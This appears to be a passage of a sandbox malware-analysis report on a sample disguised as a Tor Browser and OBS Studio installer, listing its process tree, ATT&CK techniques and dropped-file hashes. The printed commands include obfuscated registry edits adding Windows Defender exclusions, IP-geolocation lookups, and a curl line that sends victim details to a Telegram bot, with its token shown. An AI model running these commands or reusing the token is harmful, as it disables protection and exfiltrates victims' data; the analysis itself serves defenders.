find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2704

C:\Windows\SysWOW64\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:1684

C:\Windows\SysWOW64\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2356

C:\Windows\SysWOW64\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:3272

C:\Windows\SysWOW64\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:5060

C:\Windows\SysWOW64\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:1800

C:\Windows\SysWOW64\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:3504

C:\Windows\SysWOW64\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:1844

C:\Windows\SysWOW64\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2828

C:\Windows\SysWOW64\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:3824

C:\Windows\SysWOW64\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\.cmd""
5⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
r.exe /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /TI/ /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2232

C:\Windows\system32\reG.eXe
"C:\Windows\system32\reG.eXe" add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f
9⤵
- Windows security bypass
PID:3880

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
r.exe /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /TI/ /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1336

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F
9⤵
- Windows security bypass
PID:4836

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
r.eXe /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5076

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f
9⤵
- Windows security bypass
PID:1848

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
r.eXe /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1640

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F
9⤵
- Windows security bypass
PID:3488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\.cmd""
5⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip
6⤵
PID:4284

C:\Windows\SysWOW64\curl.exe
cUrL -s ipINFO.io/Ip
7⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city
6⤵
PID:1692

C:\Windows\SysWOW64\curl.exe
cuRL -s IPINfo.Io/city
7⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country
6⤵
PID:4984

C:\Windows\SysWOW64\curl.exe
cUrl -s IPiNfo.io/country
7⤵
PID:4848

C:\Windows\SysWOW64\curl.exe
curl -s -k -d chat_id=1476438440 --data-urlencode "text=Sup1 (23.11.22) IP: 154.61.71.13, Country: NL, City: Aalsmeerderbrug, UserName: Admin, Date: Sat 11/26/2022, 16:50:01" "https://api.telegram.org/bot5705253590:AAFVFnRR0s9sfoSDjSj6MrjbXJ5e1ipXBUM/sendmessage"
6⤵
PID:4168

C:\Windows\SysWOW64\attrib.exe
attrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vBs
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4788

C:\Windows\SysWOW64\attrib.exe
attriB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cMD
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3084

C:\tmp\obs64.scr
"C:\tmp\obs64.scr"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3236

C:\tmp\obs64.sCr
"C:\tmp\obs64.sCr"
6⤵
- Executes dropped EXE
PID:3500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\d.cmd""
5⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs" "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmd"
1⤵
PID:3776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Hidden Files and Directories

T1158

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\d.cmd
Filesize
196B

MD5
e52c42323920454d3917100c0a955645

SHA1
00b5973b8f5a1cdb428addf063c74433bd309417

SHA256
1a1008b1bf089cc34c094151f2768eb4889f674f2d84feb9cefa1a22f9cd4749

SHA512
fd2b77203c53ca1a96ce12f44f15629297661ad5103f34ae2a34b9f3bd3c895f7330e859054cfdcfba3a324c1f393659d3525e021121940812bffa668c11c593

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4I7L7.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4I7L7.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\.cmd
Filesize
28KB

MD5
08fd334038ebed665c2fb2bcec5456f1

SHA1
05847a3d0fcf514c313e474c212d80f2561143cd

SHA256
3aed89b804bc9bf676fbf9a3bcc246ad5c18b3060d004ab8d5fa7a2d1274d8ae

SHA512
fa5f5f8f5ee3c68e91ffdd69b4bcf3751ecda78cff1d54ad31df83994c6f5281893c2fb61ca7202bf7f3df6bfad5b4344b9710cac6943de17c04fac59d94703a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\.cmd
Filesize
966B

MD5
c06a8b85b2df537dbada97878b34c468

SHA1
fef562e98693763fd96624d5614bece1381dab42

SHA256
6b070e91c3e66ee44dded328e67ae453e311d4614e7a6c985a6b3ed62ca0b9ad

SHA512
27c6db4eff748543cf3a8ad87b0ac8f040fb3447be021b6b8b62133aa2b22d2511fc7c7810b27c30870c4a638f8e2cb4f815f430dd0c705e47c0aacee8cbe42c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\.cmd
Filesize
678B

MD5
efe1deac1b6d60d177fc1f95d9827336

SHA1
155ec2c342fb92bd1f878031e5bb6c4006b4aa10

SHA256
1932ec1c8242c0aefe0dc3694ff7ddd4a05db885bee56f8ceb8739fc45e109a0

SHA512
d5c288ed6c57172ae366b0559e8f83c6fa97409af257211f3d5052b1ef4ba9780a7eee7c116b328ed60fc1330c8a938259daabb1e62fec8c75d63f3d91cc0b6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QAHLO.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QAHLO.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS Studio.lnk
Filesize
626B

MD5
d24468f5d9c81b763777f68b7c148f3b

SHA1
0a4de8f6e825085f64fd71346f486b44926192ee

SHA256
c668ae89f8d699520a3d65d0758ed8e5575399201d37ed43636c9bb9f6ba9871

SHA512
5fcb07d86000697032873499b98d959c57c618c60e862898029ef91a60a112c00db63ff2548f1f208ba8ffd9f6a77b01f9e91ee2a2e973582822417065291e09

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmd
Filesize
186B

MD5
ed8049734d287c6abba94847f82d0060

SHA1
71749905a154683ff7985dd533e72d3dc2edc6ae

SHA256
78faf137cb9ebec068e9b3e0fc4e9a03ccfe854d80b05ccdd39c071e44fec680

SHA512
d83615322dce6b589b7639239e2442758b1fcc29867932427b58823d63d0162db09b84dee3fc9f88d6b0865c6f0f58037087787d465ec48b85594d7e8a353091

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs
Filesize
67B

MD5
6229084e8a7b939a67a9cb8f385e9f1a

SHA1
1131557d825c526f066e74ad77bbf6d588ce7408

SHA256
33bfc99196fb169f0ff2f8a83e72a5d47cdb01c9fab7abda154c935b08120e3d

SHA512
a635e61fae2cb486865dfbfd57fa0f80e81108004e814bd50a7f7bc81189238a629a21acd75ec34796f14f50e7f9f0c9a19263a3d03e4a65a27eb6e03fa16fb6

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml
Filesize
3KB

MD5
ce3e1345412254498db515ae7e301034

SHA1
7f7fdebbfba4e711f34f9dd07d22c196a3e33f15

SHA256
c8539ddc1fce37dce749299699d989eb615f09a7f11f0350b8fa9b000e0f1779

SHA512
f86456b6256449606c8808a060b9a3027aac19a8b97af0497a4474f3db6475a12b230fdf8d6d6fe7c028bc65f5e8c6847c55386f2c86b4f2ff553cad29af7828

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
861B

MD5
ccaab279e1a808f65f24f8cf9f76ce9d

SHA1
4f03dffdb7468fcd96d701c2a1a1f62f056e3cc9

SHA256
4e6391c2a6b4eb748e3b83906b2cfe743f9645db6f2d44732a12247e62c2963e

SHA512
1af8d3ed35eb928bce408aa8ba2aad8eb4dc92717d7deb00ece007ced8381ebed82a27e6ec17bf9e747cce9f51f38e686e9edfd20c5920691f1f1bd15e89e5ca

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
902B

MD5
7b214d6d95ff114c808d1e64c43c7f2d

SHA1
ec8626bc0b1e557e6137691f4eaeb8fa9a99009d

SHA256
eebfe6d36feca8765826753f10403a16620618ffb779eca61d017192e64e26e2

SHA512
0d46da98af73cf44be51b0f4d41ad4d3463db0ea9d815bac660748ba116f12ac2b1937fbb0143f97b46b82c6577dd185e7aa5722e3b1acd08d15b04b5bf217fd

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
942B

MD5
55334a37089780f18eeaa70f3b274baf

SHA1
c14598167d692accf83ccd22004b176f59c557b6

SHA256
fea20c810ea7f8ddc49f2326d3b7479b2ca87bb9673428d21f08ce22ad37b58c

SHA512
9451de09b5b5b6f4a90bbdb499a68866e0633076df110cf103932dda00b9f29e771ebe06acb61c1ff283e7b4c7192d37ecc598adae7d98fd651a225eb9894289

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
981B

MD5
2920a7646681f086f0c966310c80d1d5

SHA1
9df9b6a4a7392eaa629cdf508352dbd61de218b3

SHA256
5875b7277289a610ccb534655f8883b80df2671cc09f8143fd558120e1038c55

SHA512
d7777a81ed48a5343c0177bb37e5f4ce9818dd063ef7f57514b7894d74f7e839660113937ada69b4e42700404a116161fbf7027710e1b6c1de1b78a4a3c7aa3c

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1019B

MD5
ea0aba7b4b47f684b5a758f6569c3d77

SHA1
1e3230fb86e0c2bbda5fed9b0d6c7150517ec775

SHA256
5d1ae84aba859fce0ba763cd2481d898c550a76bcc091258636f50a117388fd3

SHA512
c2a1096ad7a34619e9dbea4a0959e2eefef1e96a752a580eb41fe8e79f978699018257be145de749fb546092b8347b1c133acbe5d6c7b1ca57f331c71e5d74c4

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
05997c72e4639716e7ddb5fd4278d861

SHA1
7b96b82400f547504f6ee32274868e9787d11420

SHA256
c0bff3a300c6a9f3e692d640f6318f05b45ae72b8f164b9a40344a91c6bce36a

SHA512
16697c60fd67964c66ead5823617516eba14400b09df3da9c7ee77c549d7e2c74b560d7a4607a537012733552cf52898bbcae1e334e7e65062958cca245a39b5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
5ae4d1fcb2d9d07d5fe778fae7ef6ff0

SHA1
883d394492e1899951866fbb43da5392708e53a3

SHA256
113205caf212653ef0b70a7382d5f77bd68243d0f81be755d045d54e268f825e

SHA512
a0f1984d0eed0db2d82f992bd50817f9af3534e2a0a8aa72aff5bd8eb4addcc850bc6bf9cd20bc9a140bff05dbf3b79647a9fb76275b96e6f966300e6950d8b5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
cd95ea96dabf6c7b2aa729c5f033ec53

SHA1
1cff2eeb87582dd88872960f84250e48143d472b

SHA256
043fc19c6cd1f211d21fae9461d8c0a47bab025f8266e5384b8fd9565fc953ac

SHA512
dd3d0a2e31eef7cd3c3ec00fe0aeaf248e51ed66543665959ecbf3ad7faeb55f77a408022fd748a5d7edff33f567c31cfbc867c8b292d003d10a43bec5c3b908

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
f9fb3575e73b4f707942d3efa582147a

SHA1
40f28d3cdc95ee46349cba64e9f0e9fd8fd8ba37

SHA256
cfd6e5acb71babb125d3f8f048f5d378c404c8a8ef1b120debbb0b1aaead6d5d

SHA512
56b8c6e7273cd752bc8b5841d45606cc2fbf919ac72312b1df7dbd57e6764e8bf979025ec8e1ca4ae5dda37f5090e4e6e26acacf1da90fea4b37a1c6a3a098bd

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
163d82b281219a265e6f035021c76670

SHA1
3defa289b4e14550ee9e2083d79fbb271fe4b97f

SHA256
62591c30bea18f749063b8f1a8ee325c3bc44550d0811313c17fce71b8754e9e

SHA512
fb6f01fa686a5fe70a8ad35b2bf0e7ffac93a06ef2176cdb186003f4576958c435a753d9609f001af7de9ce4d31096ffb54ff3f68ea700f0d1714142e965790e

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
0298c46468b2ec577565a92bcd2114a0

SHA1
c996b85993a2412213de6ea3bf9ee12ac89a6fba

SHA256
08525c2616d669c081322d463e65892d66083384ffd781e229af4c0de9450a40

SHA512
942f164527165840286c5b12fe3b314dfaade9c546abf260cedaff0cfa90a5784739991fdd7fae8d6c56138d45e2e2450161312dc4dd90ff3f3856e251f17f90

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
9f8eec90e96b330b1ff59776077fc3e2

SHA1
842f418d71df86676b69a4ebdbb2c94473dea5db

SHA256
c50dd21ba1400408267a24c9ce11d55da7817cbd1bc37c2059e65e91a097ac46

SHA512
273d5863df64cf2edd299c7832edf50ec39c8860068405349301f8df36e922c6690cca7fd1bfe40b7a920d01db56b5fb980a17e4e34c21802b254d3fc0353c0c

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
5858bb84aed5be16c369a0a14d0f3bcc

SHA1
75183ccbd219e798f8b091931adad94524a2fb84

SHA256
6ada142f57568e0922c2ac4439370497f587afd1646ab27d5d789d73cf1b107e

SHA512
